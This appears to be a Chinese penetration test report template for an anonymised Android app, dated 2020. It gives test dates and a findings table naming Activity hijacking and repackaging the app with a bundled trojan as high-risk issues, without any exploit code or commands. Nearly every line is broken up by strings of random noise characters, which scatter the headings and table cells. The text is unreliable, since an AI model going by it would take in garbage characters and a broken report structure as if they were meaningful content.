0 V# p, v. X; D3 H! @
! g5 Z. F8 |0 T% J / I7 j1 z7 w7 }
. v# T+ E# y+ {5 k: t$ J
3 {3 Q4 [$ T0 W% Z( P, z0 G
, M' b& _8 x- H5 \
& i* f4 Z) k1 x4 |1 Z1 W/ L. C+ c9 x0 w9 j9 k; ^
& G- y4 D. z* d" Z) j i. k" u& m# V: ~; C- U, R1 j; U
0 A4 Q4 s) Z( C6 H( p' S$ w
+ L2 k" Z$ Q3 v2 K" {3 v
文档编号:
8 ~7 M/ @. f. I; |. B5 a5 h
2 s. e. l" T1 Q5 P7 U
0 Q; A2 p( [. `, _- T$ d
6 i; z) A9 h: q: m4 W 3 O# S# E( C) @' U0 [. j c
1 R7 ?7 k7 B4 d* U( n+ k6 v : r% l0 R$ l6 {. ?% w
: o: P4 i. ]8 ~/ o' S; g `
* Y3 \# n" F/ Q% v1 w$ E
9 s R/ X. g; Y3 o+ O ' v$ ~; C5 S& s/ ]$ O# z
$ c! {" u5 l( Z% M( y: } O
7 x# X' @, u: O% ~* \' S
3 P9 f- v( T7 A
; e* ]5 K8 t/ S) _! V
; ~8 N( Y$ a3 K* R7 C
6 f* H9 _- C/ J% R$ b5 u' j3 h6 J9 I$ P% B
& A, |. H0 _* t5 ]! M
: ~! S6 |0 L! x( o! G! u, j
" i* G2 |$ T" X) O
$ \: q. W7 x& _( ~
. Z& C8 w7 C, K. E6 P1 |, d: I8 Z/ |% N
( r# o* b! B* ]; s1 m* c7 H) v+ d# b9 G/ Y* v& J# n$ ^/ l
2 x, K2 k" u( ?5 e
7 h; [6 E' g# l" ?" b 1 N) q6 M3 ^& e7 q
' c. @2 z3 O/ ]( x8 j0 j! P; t 4 @6 w" k( U4 {3 ?
! R" r3 u6 U1 Y% Q1 v; F
/ y/ t3 m2 s( O. _0 B
8 Z: Z1 d5 x$ n" e6 h 0 x- q$ P F' o6 W! n( i8 |- s
( Z& b/ c5 F G! e 某某某APP渗透测试
5 ~* Q( o! J% ^% ]
$ `5 U! J: P6 t* x
6 C* h; s) g7 ]$ \! s4 { k h% N
# Y6 x1 Y- u0 S @& J7 B" c" g : h ?& k. V9 g M1 a) s
2 `+ t9 ]' n/ S h+ f
7 {% [+ b, M7 h5 t! R4 S
) J& t0 B0 H+ Q$ B
3 i, {- r6 e, } g" \
4 B: b& x9 S* }$ P; t$ y 3 T5 G$ o- Z$ {
/ `7 l+ q$ \( }8 p
" S4 { V2 C l3 {
$ i& W. R5 l( u' W+ R1 Z- G4 l4 }
$ A4 k5 t, V& I3 {% `. N' A: N# A
3 E) n( J3 q1 t) l# _% k7 q$ I5 t3 b; X1 v4 }4 i b
# H0 j( G8 X0 k. A8 i, |
; `: c. C1 J0 q# Q( _
( b0 f0 _- l+ I" q
0 W' A5 E- Z! p+ W5 r
; W# U6 [7 ]. Z2 O
0 i% `3 D( L7 L9 T) f8 G+ E
: \/ B& k9 S+ `
1 i) P$ s6 K ~' |, f# S
1 Y6 b) C; `. }; H. y2 c7 N4 q( U9 ]/ u; V" E; S# q' d7 b/ u( g
6 ~/ q; i0 K& A. `. h: e7 g! `
% G) \0 g1 z# u5 }# s7 r9 T 技 术 报 告
% I- h! b9 D$ q( O
8 G+ {3 t% m% S* ]7 X
* J, Z* I: w5 h5 d! o
/ |$ b5 E' g6 _5 J2 H. t# }( s
& \; I' t5 R* T+ n. v
% z _+ Y, e6 L# V$ ]+ a
) C: T; A3 w1 o* Q% a
- b8 H7 F! f4 s S* v
0 i( ] G5 ]: p4 B& n/ |1 m% z x6 p2 L7 k7 N. Q- G
3 Y: G7 }3 E6 x4 D. x& P4 R: p4 F8 j3 S1 U( n$ F3 Q
- N- d& w4 y, r; ~8 y* I+ e
( b, g: M% X$ {6 c7 @' C) G
- }6 g) [( c! s/ G+ M. E6 | [$ x" s, R4 v8 n
8 E R* P% c7 w5 f
9 d2 F5 ?9 r. n ' p! t$ ^! a: q% f5 F
# O0 ^( K2 N. p: L0 T
& e! I& P. Q/ K/ w& ?! S
2 N5 `/ s! }5 H3 g" i8 _
?; N" m: r1 o' n' T* Z2 h$ x, G4 \1 W- R
( u7 r7 W% l2 }. y; C
0 x( p8 e' H- @9 ^
/ ^0 ?3 l8 r/ n1 I; D
4 w3 m) y5 Q: m! _2 z9 F
& N. X4 T( ` d# ~' O% r1 S; D! |2 |/ Y/ d& \1 {
) d8 C- L: Z2 }; H3 L
" j2 _0 V$ m" p; G
. a7 g3 A8 Y8 V. ^# O
$ h) f6 `% `# J2 a" u# V
D5 [2 {6 I5 T; _' V3 j/ N
5 ]9 z8 @- ?" y
; n3 }7 q' \. M$ ~& U; t5 r4 T
& h; u# N3 T! U( G- F; D$ u
3 M7 W& B" c* t9 t3 \6 ^: ~& g8 @. ?# o, Z
8 F+ N& i2 E! x+ [2 l) f; r$ H- p9 [4 s2 j
# V3 _) g! I; Q0 N$ a K5 A! o/ }$ w
2 K# b( I6 l( R4 Q
4 J: y" {2 u; f2 V. [$ ]% h
/ n2 f# h# \) m4 ^0 X. \1 m
: Y2 }2 G* {9 W x; u/ W% G2 A3 v) g$ N
1 a/ y2 t# p$ X- q
: o9 b t/ ^0 q4 q$ k% L; b
! b3 M4 H6 N( Q' J$ t q4 J, N: h" N/ w5 {
- O' L/ g0 [5 S! O5 i Z2 `8 ?) H1 V1 M- i1 k8 w2 O- R
5 y( J1 \! N# j- X" g' t# N
; H+ f& h' E# K: H. [
& S! i5 c1 |1 z2 H: E8 Y
! O" L3 g9 F. i) G w# c 3 z g& m) k, K3 r+ J- g7 c
0 l: c+ t- I: N9 i6 B1 Y
7 j) F" e' ^1 n, t$ S- H
) f- E7 |! n2 y! l. D/ v: |4 V
" i( S0 {! D A, O% B) G' R- V* e
6 h" s, G: r% P& t/ @9 I% M 1 k$ A9 {& @2 i4 f# ~
( X) P9 Y K S* A, W- {* Q / `8 z# D/ c0 t
+ v& i0 N0 e* y7 K* V l' f
1 Z3 p; S# f: p4 `, |( g: L, G n1 t- D) U" |' g0 u9 X: h8 k
# v/ K7 x! y( E8 Y! {' C( {8 e n g
1 C) t8 i. L" V, ?6 n8 R- _2 _
: N+ ^0 H% M. D ~' K' m: ~$ X3 e9 Y, r
. f: @4 a4 D+ D8 x2 V8 x
4 g" v0 n( W$ \) P; m. [" o7 V3 A# [/ S. S0 Z0 _# ]0 u6 \2 ~
/ X1 }5 n5 }: s# N( [% J1 x
# _: X0 S0 T4 B" P1 w- v5 h( j
/ C- q. E2 `7 @0 N S/ M& v5 j/ w/ J5 q: |# j9 y
( L5 J, u9 r! v* E1 g4 l4 j
) G+ {& z8 S$ G. @% i' B8 R% k, x2 [ . H1 K# P8 a, j' W2 u* E
* L: P- I" z4 e% ]
- A& G; J! c/ E, m: G" I
# S* u% t' N2 f% a6 t& [
: D! F# L" ?- s# r* j! g
' ~2 W* |; E* c% c' ? - y8 ]( @ X" V$ N Q
! W/ @& B* _) [3 \2 W m1 J , n. |, o" q3 E& l, |9 \
2 E2 j& _) { C4 _% z9 \% O/ c; U
: ~$ ^- m$ n# F* G1 N5 [
3 n1 H3 p2 V5 ~9 o# r, [ # H' I- e7 }- R! R
# x# p9 @. X- O: {& ~: Z4 }' B
2 A5 O& |/ v" r1 p+ S
! ?9 w4 z% Q- B4 ~0 f7 ^7 d( f
1 Q4 Z( U) M# t/ F, [0 e6 Z9 Y1 |
% i6 g* T5 c6 \9 m& X4 c8 @
$ o( b; x% K; T, E2 t) Q9 L S+ S# J+ d4 l" {% O O
% Y7 V5 C' v' t4 H9 S; t- t% J! K) N1 c; Y9 R( ]+ c% E C" H. W
$ H. A6 h7 y4 _4 q3 j7 R! P
0 j6 A+ K. [( g; [) z0 W
. Q, Q5 b: a2 M: D: Z( J
4 U& L- u3 C* C1 ^5 z3 y6 o/ x) s + u9 e' H) |4 U5 ], _
$ N) f" o% \( o# m% N
" y; [- n3 g2 Z5 _. Q: k. K+ w) k# R _5 ]2 o z. Y$ l e4 ~
' s: F) J: I1 A X& W/ d$ W
# \0 x: o0 ?8 M/ ]6 T 二〇二〇年 9 p# S& a# u0 F& D" r
6 T3 Z# T7 e) X# T1 ?
3 f2 R+ D! z; K. |$ r2 I9 R0 A% Q9 a7 V. c5 ?! ]& k
5 W4 L7 S* \. d# N+ n: u
0 |4 H5 g4 ?$ B: x3 x6 c' H
$ i) f/ ]1 u" R8 P z! l
0 L$ A% H& M5 i) H
5 H$ n! h) n+ s: O+ v4 ^9 I: ^ H( `2 B" D' n3 G
5 W5 I8 l' j; E5 c9 _8 r* |, m0 Z
6 Z, f+ [" H9 V9 k) V. E
3 l7 L& n. @3 A
, q! }) V# c5 g
* A# N8 o3 t5 r8 n
3 D) [0 [5 W3 F: t3 |) g! ? 1 S1 k! X% w) W8 k( \
k& i c' I( c8 t C% }9 x
) T1 I$ h: I: O6 s4 W$ w, X
5 ]9 z, M8 G- t+ N- s2 ?& _ {* L- r' }. \, h' g9 L _$ {
' u: S7 |9 S8 H8 @
目 录 " n- l6 b# T) r- ^" W
1 p7 _# v* b( m6 p
4 r/ G9 E6 V* b9 q. @* Y" U
1 t( x6 f9 t0 A8 S
4 l! N% \6 A9 K/ d! f; ~3 g6 D
( a1 g; S( F7 d- x# r4 W
3 c8 s8 \' y8 f/ C0 X6 v, s8 l
' w) V9 m, s: G+ D 9 U$ \4 |: u1 P0 i" O |; Y
1 |- w8 _1 j9 `
8 V8 I% G/ k# N: F3 {1 n! q3 i e
5 C% @; h3 ^0 N, g+ m- V
9 p Q: i1 t* g" i _8 [: [
' d2 m6 Q( x9 k- u* Y s 1 概述... 3
8 f/ p$ a$ f( r
2 X0 @/ m- c" S
7 \! P% }* X. n. n0 `* l0 G
: w* k9 p- f9 ~( B- g8 y 1 Y* C3 E0 s; {5 N1 d: \# A
% F Q8 Z7 y, F6 m! _; C
1.2测试时间... 3
, s. J: l4 W1 d8 ~
8 m4 f- e; V6 u# w7 Z2 E. U
. J' E& w) f5 r* b
9 Y* l/ `$ v8 i/ r% B5 C " N- [& C0 g# |; n% H
1 b; M" e; r5 ~. J
1.3测试对象... 3 % h, I, R% |% D- D* ]! ^
( T# H3 O% M8 C( }. R
7 O' @7 C/ V" o' A) T- t7 n# T
3 Y5 G4 V) B6 z0 C3 Z. ~% p/ R
# I/ U' p ?1 C
8 a' m, c2 l* P7 i2 x 1.4测试结果... 3
5 n7 l$ f9 |- d6 d( q* L. B/ u; H2 R: b7 _. |
% k8 i2 g: x1 i2 E; b3 q: d( _
5 m- ~; e5 b0 z& I
2 J" ]4 r' \. ], [3 F; D7 B E1 ~
2 检测结果... 4
+ d' `) }. ], l& d7 t5 B6 ]' O$ H2 d! p% g2 d+ B$ {
. d4 `, p, r) q* k$ Q* N* R8 U
) Y% d+ ]- C8 P" J4 S+ T
: m0 E: _' |6 M" h2 f, Q6 a7 v7 H4 \
& p a" f1 u- A( y( } 2.1 某某某... 4
) H* k* Z% B$ f
8 q; H& c) b( c5 @: a* B
. n* S/ e4 h; F* S, t
1 n4 j; s& T6 K6 Y ( K6 v7 m1 w( _8 f
( b5 \) o. m: u7 f 2.1.1检测目标... 4
; @5 z* J6 D: O+ T) S5 T
+ [+ k! g+ l, b& a6 N- e( i
. O$ ], f: l3 q# @$ @
& d+ L. e8 ^& X- O3 s* Y' f
) c" ^$ q6 {* i, a" Y$ n
8 j5 ~: C* T; z [! ?$ A 2.1.2检测结果... 4
' A: v$ F9 f h. ?, H: R1 F* M+ @+ r! t( ], H
4 N& j- ?9 c4 i0 b& Q" N5 o9 t, t" n, ^. D
6 h! [* _% ?; U9 @# Q+ D- s3 u1 j) S1 w, X* n7 T) t0 C
2.1.2.1. 4
$ H3 R" C% I! \% D9 L+ F! r) J
0 W+ ^: @1 m* |1 q7 ]4 C" j/ B
( ~+ I y2 g, \( ~( z
) p; x% I9 H! I& G2 w
. r c+ O. [7 K# O% G% \
2.1.2.2. 6 / ^3 N0 a+ G8 V4 c# T% e2 k
, S0 N7 U. }$ A( O' V9 |" U: g3 Y
* g, N$ v, w7 c6 M5 N
6 ?# K$ O- I' k2 w . z9 J# Y8 O8 h; L& U/ h
1 ^2 b& j' m, F0 w0 b- |; G8 C
j0 M _2 p' v. x* |$ N. K6 g
@. |; P; U7 ^# T
9 q; _9 [% R' o
$ X- n3 T/ \8 g- | z2 w$ K7 _' H# ?7 n' Y& H" I8 q
$ B: b" b/ d$ H: m1 Q& p. _ Z# w
4 x( T5 X! u: R6 ] b! l
5 I( E# ?" A, f
# U3 ~7 Z& t& R1 ?$ D( f( e% L
$ E$ f% P; g5 V' P; n* | : n6 s) y& d9 U7 h1 Y q
! C0 L% V1 X3 N% y2 E
! u: [# \* C5 U/ p! L
3 |5 v( [( s( F1 o 1 概述 " k4 Q) R& }4 m2 j! d
1 T% b$ N3 }. j5 @
; Z) g+ _# D `
7 a9 N- H9 C U6 Z$ y7 u2 {8 O, H
) ~8 J+ w/ k1 B& K) [( |# ?& p4 k' j" T# g0 r9 ?: Z& @
1.2测试时间
- @7 c4 W9 W8 E
: W1 f! F$ F7 V
7 L+ ?+ h' a2 h0 R6 y5 B
! e0 d# m( a- |) _9 I5 e8 z; }7 Y0 d 0 A3 L+ X8 g) }' Q e
& V! ~( `9 I* ^' g2 {: o# D
6 r0 n+ V& V0 b/ k- T) }( y/ ?- ~% M2 e4 u1 e4 E0 c/ m8 _- M9 `
' s7 U5 S: r5 ~0 S. E5 H
1 d3 H; H. p' t! [' l |
7 a5 C" b, \0 a% [0 ]+ a7 [6 J0 K0 X1 _7 T0 u/ x* H
" F6 \ F" | `% R
# X$ Y7 A3 _) d) T4 @+ ] T% Q 渗透测试时间
% ~9 d, B! ]6 S9 b; z
) v' q' s! Y( u/ x }
6 [2 C) C/ w0 ` U
% H4 }9 P. H! o1 ? | 7 l1 u1 F# _ M1 P- [. @
5 l8 B2 s9 x) a9 u7 W! L7 h
, d* u! w2 J; \/ h2 k
k7 i1 }9 _: D) F( W 5 U& T( q) ~4 H* U
; x2 {, C- L' n |
. R* R3 ]- @" ], i! A6 C; K+ F
5 v# p) q" C4 N0 `5 ^0 ^$ w$ I4 |
2 S* \: l8 g# D2 w8 Q7 e
2 S1 K- z2 c; \5 t: I$ `& J 起始时间 & J- y g6 K- B' k/ s8 g: w
8 f: ~( H+ u* K" w; n
7 C5 k& x" l8 j8 Z( v/ R1 V& r/ i% l9 l9 ^& O: {$ @3 k/ d# D
| ! Z# z- d7 c4 H2 _- y$ }
h f; z: w; e; ]$ G7 ~2 h( u
0 b) f& Z {9 P. E1 S8 o7 u
3 e5 J; U9 s8 d6 y1 D/ r1 {; N6 B! f
9 N) B( h" S1 v' X. A. h
# o/ O C3 ?; @+ N 2020年4月6日
5 X& k( I6 t8 ~
" Z x- a, Z( {) v - M* \' }, P0 ~3 c
z6 W# Q$ w8 D/ G |
! P0 d! n B9 }8 B4 w
1 W' k7 V2 N0 U$ ?$ O
: N, l& L5 p9 p5 W! ^$ w3 Z
# B% P' i7 i: r- ~
" G* w; K: Z* @! W
4 L, T% b& k e2 V' ~# k4 s
| / k5 N; `6 O+ O# {3 K
( J* h* u$ h' L7 G. U( ^' y # u: _4 r2 ]; [9 d# i7 ~" @
, X) P, j+ o9 q6 B2 g
结束时间
4 m' s7 T' Y1 v( s) \5 d" ^% n5 W: |6 r8 ]
8 R& o: X- Z7 t1 |, c% d' v& P2 m/ T. v: D. |2 V2 g
| 7 G1 T1 d: w [. F; h+ M
# ~% ?" i1 G4 [* L$ e, d
+ k, b& d7 ]) x( a
5 y, }8 i" u0 Z2 b0 h! ?. Q 7 n7 m1 F4 v5 i. i2 [; D
9 ]6 R. f: ?+ e" w 2020年4月9日
1 G: l; O# i7 N7 P& f6 E0 n& w
# n; ]: O' E: {9 H( m3 e5 l
& D/ C" i: Z# @- j6 l5 q" C/ w. [0 E5 I0 Q" }( b4 ]: c8 E
| 7 Q) ~; H' }9 r# \4 e2 ~
. e D: N& p/ {* _0 j1 Z1 a3 Q ~
- T6 z8 w( _4 g. j5 A: f& w# e P; S) I) I( a) r" j0 s/ c
: r" i! \" e! P. [7 r) j* W
, B+ q9 t b, Q
" ]2 B/ L0 l2 {. }9 p( |
U8 \ {' [! O4 F $ W7 E! \) ~4 F' @ ?
. d0 J. r' M' R* J( k. A 1.3测试对象
) \. j3 V8 X( A; A# a; n! p( }5 G; y
- R$ z' p& k+ F/ I
# G V) G @! c/ ]- X+ |
[% ?* s0 K: O- a# r
; t* N7 A$ B; P8 t, U. f 此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示: & r4 s; ?) \: a/ N
. f+ x9 d- k0 S0 w
/ R1 J' M6 W7 Y+ q
: L0 k$ |. K# A( X4 { K8 J6 o
, ]$ U" L7 c+ r6 g; A
/ }7 {& c: V4 ~$ e, H: `* [! Z, G
表1-1 检测对象
$ ^+ g7 B3 D" k8 F% l2 p: @) W! M6 z3 i" K2 N
" r% T0 F7 s- z
9 w: _% K) G8 \! @2 b. p3 W5 M
Y! i: S* f. |0 ?0 U3 @0 G1 j8 l- \9 ? z( L) j9 n
% t# ] M' A9 U1 h! H" K% @! N7 s6 \# O
5 I K( _8 s+ f& f; m
; u, B z: }2 Y; A! L# h |
" x! S5 ^, k% q( O
; ]# }: E7 E$ `3 ~. J + \- Y" ^, ]- b# R' _ W& m
# l7 x* Y. W! S. R7 t
序号 : M, x8 H( F+ i" n" m% A
$ `4 H+ E `+ X+ w, H
/ _9 X. P/ i" w( J0 |1 Y u+ F1 M, ^: V- O$ D
|
& d; y7 F) a' _! v7 A6 C+ t# g7 |* V4 _7 |6 k
# p$ v4 g+ O K4 \. @- H
; B# b' U6 j0 \, A + U) E& |, g# p
T4 I+ K/ s1 ]( v3 ]; n. u, ~ 测试对象 # K# T! E9 d) Y9 E
3 `1 G3 p! }; l. Z3 ?0 s1 W : F8 _7 d7 T% d( F
" o0 V9 {9 |7 ]' g- x | # S5 I0 a2 Y# A: G
2 c' G6 e" H8 l/ ~4 [
; W+ _- [3 ], |7 f( u
- z9 q% Z" N! D) Y+ B1 L - Q3 i5 I' L% l1 N
3 ]5 F# ~! n. m7 f j 测试地址
2 U& V) E9 P4 H3 f# ]# z8 P4 P; C+ w: y& L, V! @; l4 r2 ?' ]9 T& f
0 n& ?, X* F! z) ], T3 C
" a" {' M. p' d! c/ E; p) \
| 3 G. j3 N7 h+ }/ `: e$ \ l u
' w L6 ~' k/ g' Z/ _
) l3 ~: g( u! ^* a3 ?5 z- q2 x1 F ]6 j
; r8 ] x- ~, Y8 f# `2 k3 k& n9 d7 ? d v6 q9 J
安全漏洞
6 K5 Z5 J! y. ?0 K) C5 V5 m6 S5 ?0 e8 W* m8 _% f
" S& g# S/ j9 `) i1 H7 [6 P" U: l& Z
| ( ?" R. S- J8 t, N2 E' x9 \
9 l. V( x( z. ]
1 S: s- I6 Q. l- I% D1 P
; F9 d: u* x O: t4 O$ C( w
. p2 v+ x6 Y: d! M, |' m! T7 H4 p* f% U/ _! A: _2 L- H
|
) L8 n5 k" L2 { K8 ]" ^; P
% P5 B2 N1 q- S, w 0 r+ P% A' K* s
0 e4 ~% o2 }3 Z- S
1
- T" l# X# W" h3 K x4 W7 m4 R% ?" [" K
: Q% d" p8 g, M5 D9 h2 N) I, e
6 ~! g4 \/ B0 w! M. p* @ | 1 z' O, }9 v0 i5 N0 @% X
2 B" E( g2 [7 C' z- g6 v% a4 s
% B7 u- N& Y: ~
) s& f) c o7 D4 y0 A
8 r, ^( B3 ]& g6 h& a) |. s' ~) V% }/ O* D: Q
某某某安卓APP * C' i, ~; P4 W- }4 R) E8 D. @
! r8 }. i W7 r: g( q& @ " @9 H4 P h7 G% `' P/ o( k
& ?, t# w+ {' J0 n
|
- u, d7 s$ G: g( y/ c. R/ G1 N
. z, U. R [! {5 N+ k
' Y/ t$ o3 P2 C7 o/ p
* I) N9 m( q* R9 i R8 S- _
8 g# A# f, \4 T( B+ O5 u) f& v4 p* R1 P/ M
1 _! f! |+ } j; R3 z: {" z% `2 U: F# E
5 J7 t' Z+ z3 C4 r1 l' ]8 r7 `6 ]
" k/ d/ l- n$ \. P" X X | 1 L j5 c, M4 r4 Z8 |
! d3 f; K# { ^ L
S+ H* u1 w, w: [7 V5 z8 v7 o# d
# S4 e7 k; F& D# E3 v
- I6 B2 O+ @% S$ ]7 X+ G: V' x 2
, F2 x: G. w2 P; @; U! `
( G8 b9 D$ s* ~8 K0 i& I 2 Q# \& {9 D9 j% e% S, _
( L1 H# o" ]- ~; X7 b# ^7 M
| ' m4 X8 K6 G! H( k1 w- [
$ \/ y, t0 ?( I. ^$ M8 X0 Z8 m
7 U8 r2 t; x% A
) E2 m% k2 l7 y4 F1 e1 J. D" G' l
) w+ Q, e3 ]) B
) s+ Z: R {& I" Q F' j4 {
; R/ p- E- M8 x2 q ^+ M
: c) u1 r( Q( I3 ~- n0 A" ?$ t, V / L5 o7 j4 N. F- Z) a
; K9 a6 P' x: ?2 S) a6 k; G& U7 H 1.4测试结果 . h7 l; ^. j& Y8 v0 N% o
0 |2 r5 A: f, {# g
2 y$ t+ E. a+ h) w! x, a8 q$ q- h2 q2 ` v, E: w
6 Q) S# r: [. T9 E: [$ P" k U
# I' T& P* O4 } 在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示:
# ~+ e t f5 E- _; v8 I
( W4 c: a; ~9 u+ _0 C/ _" ]: f
/ H" P$ t4 B" u# P# e
) p- o" V) k* z4 e3 n0 k ) u) [: m' \* d$ w
0 s7 U4 G) N9 P4 P- A3 D
! Y& A/ L6 J. r# Q
) N- o' g. h; v! U( G5 f
. D; B: f. X( x0 O
3 T) v' M8 j& \5 R! Y- a& Q0 } 1 d# W) K* \( b" h( S8 S( L
7 m6 a: X5 q& s6 x
\- d6 A/ G" P/ a- \
' B' j2 ?& I* I3 p: q- K; u6 j. j6 c
3 T" d: [' u& n6 M
& R0 d8 T* m1 n( F
" P) D8 [5 m0 Q4 r' N& ]4 [) L
& U! A( ~2 Y9 J. s | 8 d6 k$ i/ S# q' n/ F2 ^, s
0 ?9 r6 v/ d; r( i6 x( E7 m! {
! ]; O# t% S0 X( ^- [" w- @1 E; G- e* H* g. v. I0 Q
序号 7 ]6 |% {$ u; t
5 [8 ~* E X* W% x" G' N* [+ z
' R% C9 D: T' ~* A
E* v5 |* e! V9 c$ Z |
( ^" O* G& Z) Q4 L' v
3 I0 b% I5 Z8 ~2 X0 I
: Z3 | C7 h( w
) ?8 V& I8 {$ B3 D
7 Y: v# i: ?3 m7 d) D: d. I- M) j8 {. A. G$ y
系统名称
6 u8 ~0 [6 D" e2 M) \" ]
; V6 h. F) ^9 N 8 V% X' U5 K' z' _, X. }
! }5 X) x0 H3 i" U( o! ]! N
|
: A2 W' O! O6 G1 C. ^) G3 Q+ A, ]1 [% T" T6 ?* [. O$ }
& U" O7 Y* m) I5 q3 V6 p
4 J1 S: h$ r: z l2 z. @7 h4 l
% S! k1 G* L0 @6 @4 @
, d% t! e2 r* H: ^- j ^4 T- h$ Q 漏洞名称
/ [' L+ d" x9 n6 s5 d. ~) c* C& N) @1 W
9 p3 E3 \- W, l& w$ _3 B; a ! g8 N. a' r6 w
5 T) n; Q: s9 w# J7 d | + Y B& X6 ^, C: H( V$ p( m" |
. L& t& {, ^6 |' q$ o+ V' v 3 e( b* `' f( ^4 L
}( k0 c/ F1 _5 j0 n4 f7 s
, w$ D( D3 L# p) R. u( t5 O+ t
4 Q% X) R. Y5 b! K; q. z# U+ Z2 |# R 漏洞危害
( ^# _. I6 X L; p; `2 F
% [# N- i N- D. Z: G" j+ \+ Z' v
) w$ u) ^5 I5 `3 s' h$ W
/ X+ O! B: t9 q7 M6 e1 ` | 9 c4 W B, k. ^9 [" y* R# Y
# M) p I& Y, v7 c) v & q' o& \: i5 J" B; y) v
; {( x: Y- M# q+ M2 X3 T% D! v
) T- o/ d/ [2 `0 h- G R
9 _ L8 z6 E* Z- v2 D1 |, j 修复结果
$ V6 z; ~, l9 q7 C6 P1 J; m2 s; K/ A- B+ c) \! {, f2 t
1 `/ Y3 ]8 \* `+ L G7 C
: p! G7 c3 n8 k* P: W | . \0 a% F2 ^6 |) k$ f3 }6 M
: i% r0 N) z2 b
1 c; C, h, Y" \# a4 W5 s: f7 Y3 [' {" E7 T$ M& k
) m E# s# [. d) ?5 k/ q6 T- Z0 M" }) v G/ S$ J
|
q4 f- ], [ |8 a" G2 p! I* a0 b% q& M1 K1 h8 R
. U; m) W6 V( L- r! \6 t2 u
. T1 E5 A" d7 I& g; \* a: M7 _
1 ; Q. ^$ f0 d5 }: G' u7 V
6 i, f5 G# G' z0 J% j) O- Y; s
; m5 T' s; S9 R
4 i% h8 W4 Z5 V) i, g( ^ | i" z3 u3 j6 c: g; R; a. a
" A( i3 Y' ?; f# Z/ D
1 Y* F) c v) O0 J& b; I" {% W+ P, ?; b+ r4 ^
: p0 N, o9 ?: t8 P! e! M1 ^# K0 o; r# |& D, o
某某某某某某APP & z& y; @) u+ f+ u: n7 s! e% X7 p
: r9 a' E5 a" g3 O
- y. f- y; k5 s: E' `6 M5 ?2 w- Z8 ?5 C0 x
|
- n8 p3 B( k9 e& y6 g/ `: D9 h7 v) E
1 L% V; w A1 L( ~: b8 u! ~( I& r; G& u' D5 v K
4 p/ @- m, p+ r* \, @
2 R+ R' ^3 l! O; W; F( O) s Activity 劫持
7 x' v& Q3 W# s& q9 S& n2 R7 Z! t/ o _( j- W3 M
, @3 k: Y) R% @) x
% \, |4 A) x Z1 x$ m
8 }/ | m+ S" Y$ p) C1 C
P* e$ c2 v0 @+ K3 ~; k 8 Q- o j7 X' L* q& q, J: X( d0 f$ x
, h; ^7 W/ M0 }) S
) e& S# U2 m" c, p! Y+ Q
! d/ ?; }1 g% A! S |
, X: Y( K+ L: N2 _ `" ?* y
" v% y) ^! K2 ~( R* f
7 X; U. E) A/ X5 l' M. Q6 r* c0 `2 Z1 Q; B' g
9 C t" l! j) l( z- f- Z; d, o. {
高 % a4 D% r6 K6 }- N$ _1 Q c
1 t7 {4 [$ I( D. `0 Y
8 d5 A/ y& \7 c/ ?* O5 i+ @
7 m7 Y5 Q1 N0 B e) h
| / o9 B! ?' |6 l7 \0 t3 f" h
0 E2 `! f& j% E
, R, P7 c8 r9 m z
( `, @8 O1 b/ x& g
1 A& N3 n* I4 H. w9 B+ {9 ^" J6 U+ S' v- _3 a2 C1 B
+ ?" R8 F) M3 r0 _% W
/ `9 x& z) Z' [9 N! W4 U, S
. M! Z" w+ \% t# \, T, A2 ^7 f9 r6 c! N# M3 g, u. X5 y( i
|
]8 h) L. y& _9 \' Z; m1 q( j Q
8 C% z& c9 Z; h5 P4 S( K" e+ Z
7 l2 L4 a6 p0 b, L `- J, _5 n, j+ M9 E
- {- P5 q2 r! U z+ p5 u/ E
1 A" i" _% ~4 s! r7 i |
# k" f+ K6 S5 f3 l3 o4 x q& U; h0 a
& y8 o+ W0 Y+ K5 X/ W0 ^9 M i % Q# u. |4 ?% ^) Y' }
7 j0 R6 T, f) T. [. ?4 B* |) M 2
5 B" N( r/ H F* U" U$ I" S8 N. ` }2 W ?' Q
4 f8 s, t- O$ r: [# _ {5 @$ X9 e' s: N- ^3 H- g
| 2 W- Q3 K5 G6 [/ M- m7 d
' t" k0 c; g# F, B" b5 k
' k$ g- ]& O M, Z; b) g$ B0 U
7 O( `# l7 o8 J/ B1 Q }
8 ^4 |2 I% N$ C& i. R9 A1 T. e
9 t( K/ D5 l: J2 P6 p 某某某某某某APP 4 A0 L/ C) q0 X" S
+ J4 R) \+ z3 U( [4 ?
3 Y% ?% {0 H5 k+ v+ s
$ H( }% K$ J! U( d0 q | % v. J, Z! t6 z7 {+ M- i
_( O% s$ z! m0 q7 w. j
2 P( P' \! P7 z! l
7 h* J3 k$ r1 j, W0 L
# d- F, z ~) |6 T/ H p2 U
! e5 h/ ]6 e6 m. @" @( e8 L 反编译二次打包捆绑木马、篡改APP代码
7 r0 b, T* P% _" I V
; q0 ?: @) s6 \; p+ X - F1 K$ {: J2 e* Q+ J
+ `+ f+ w4 k/ H$ T I/ X |
. U% d* V5 ]4 `3 u; e# l) b, e& h2 i2 a7 T. B7 _
' \( I, n" N) A
1 L0 M: W$ `+ A! }
2 c) M5 E5 n" t" C2 D" }3 `: f: y1 G6 N. u6 _& r5 X
高 : Q! w% S! Q( |- o2 b
& O9 ~: }3 S q0 p
. H$ t! V6 G- Q" C g. J4 u* A9 L9 V% b) m
| 6 t9 l' s4 l8 ^
2 [- r6 k& ?, h9 c
% o( r0 Z! X9 H" Y+ z, Z( r
; r: I7 ~7 {" W! {- d* H& g+ Q
8 f) \/ @9 ?7 z) {3 i: g$ n4 D" S1 q# m# s8 k4 U8 |# b; L# O
; u" A) d, Q) D( M1 E9 y
& s( J- ~* M6 J: P; e. K' ` ; v% E. u9 F5 I' Z1 [" Y2 Y
. n4 r+ z" P g- \ | r2 g" S8 \4 l T, m4 i
- K" y( `$ s" u4 \; `8 m: G) B' n1 E
5 M0 e! D7 E" H$ e9 J
4 V1 g8 B% p$ j* g 2 q. u) p6 l7 t8 x. w
, N) Q2 F X' p7 m! U6 A2 a5 ?
0 f0 q* O. V" ~3 l0 T2 `' l* f) _- e0 s' `8 _
) O: Z# h+ ~, p1 l. N! }! r
p* i, I" Z8 n8 L( {7 N2 f r3 c * `$ R/ H: W8 L) Y, K% j _7 [
0 y p9 |) A2 n0 V- J4 n4 C
! Z; ~& c# z( D" F+ `4 ?- f, q$ |: _4 X3 K0 x
( D! E+ b: @) U7 Z
" `/ x5 i& K. h- s2 G* O6 ^ 3 y6 W" Q. y* P2 T7 }2 @
) E6 \/ O! |3 g% @6 S. n
